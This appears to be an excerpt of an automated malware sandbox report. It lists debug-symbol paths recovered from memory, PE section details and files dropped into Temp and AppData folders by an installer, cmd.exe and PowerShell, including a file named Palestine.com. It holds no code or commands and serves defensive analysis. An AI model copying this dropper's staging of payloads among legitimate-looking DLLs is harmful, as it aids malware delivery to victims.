                Source: Binary string: D:\temp\atkexComSvc\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msvcp140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\NICInfoLib\x64\Release\NICInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUTypeCmdLib\x64\Release\CPUTypeCmdLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msnmsgr.pdb source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: z:\libusb\libusb\os\objfre_wxp_x86\amd64\libusb-1.0.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdbp source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\openssl-1.1.1j\libssl-1_1-x64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb33 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtdeclarative\qml\QtQuick\Window.2\windowplugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdbtU source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\p4clients\rel_beta\Projects\GazelleProto\Client\Engine\VC80_Release_Static\SteamEngine.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\Common.Split\NetFx\obj\Release\Microsoft.Azure.Storage.Common.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\buildworker\steam_rel_client_win32\build\src\external\SDL3\Release\SDL3.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdbF source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb88 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\Uninstaller\obj\x64\Release\Uninstaller.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdbLL source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb4 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Net.Http.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\LogHelper\obj\Release\LogHelper.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\HardDiskCapacityLib\x64\Release\HardDiskCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\OPHWInfo\x64\Release\OPHWInfo.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\x64\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\projects\SDL_ttf\build-steam\RelWithDebInfo\SDL3_ttf.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb\.~. p._CorDllMainmscoree.dll source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtbase\plugins\sqldrivers\qsqlite.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DiskMediaTypeLib\x64\Release\DiskMediaTypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb,,, source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtgraphicaleffects\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\dvs\p4\build\sw\grid\oss\POCO\1.10.1-all\_out\msvc1600\x86\Release\dynamic_runtime\PocoInitializer\PocoInitializer.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\USBInfoLib\x64\Release\USBInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb!!! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb|| source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_InstallTools\DeviceUninstall\x64\Release\DeviceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: contactsUX.pdb source: msn.exe, 00000027.00000002.2223565420.000000005A701000.00000020.00000001.01000000.00000012.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5Script.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msncore.pdb source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb2 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\HalUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Microsoft.Developer.IdentityService.GitHubProvider.UI.dll.33.drStatic PE information: 0xFB675EC8 [Wed Aug 29 18:34:48 2103 UTC]
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe.17.drStatic PE information: section name: .didata
                Source: V2DDYDPIWYUTCJYUB0IV5.exe.31.drStatic PE information: section name: .didata
                Source: clrjit.dll.33.drStatic PE information: section name: _RDATA
                Source: CN.dll.33.drStatic PE information: section name: .buildid
                Source: CN.dll.33.drStatic PE information: section name: .xdata
                Source: tipskins.dll.33.drStatic PE information: section name: .didat

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\650429\Palestine.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\UninstallFanCtrlSvcLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LB16K.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\ICSharpCode.SharpZipLib.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Common.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FAN.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-CCHIR.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-4L189.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O6NPJ.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BIPBA.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Microsoft.Azure.Storage.Blob.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MB90D.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5OpenGL.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-56DJF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QPNLV.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Sql.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\NICInfoLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Uninstaller.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-RGA67.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-03H4T.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HardDiskCapacityLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\windowplugin.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1BB9P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-LLMGF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\MB_Home.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QM6QO.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HA2SV.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IOD6F.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HttpUtilityV2.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\PocoInitializer.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\SDL3_ttf.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HWComponentPlugin.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Network.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpFile created: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q7DQ7.tmpJump to dropped file
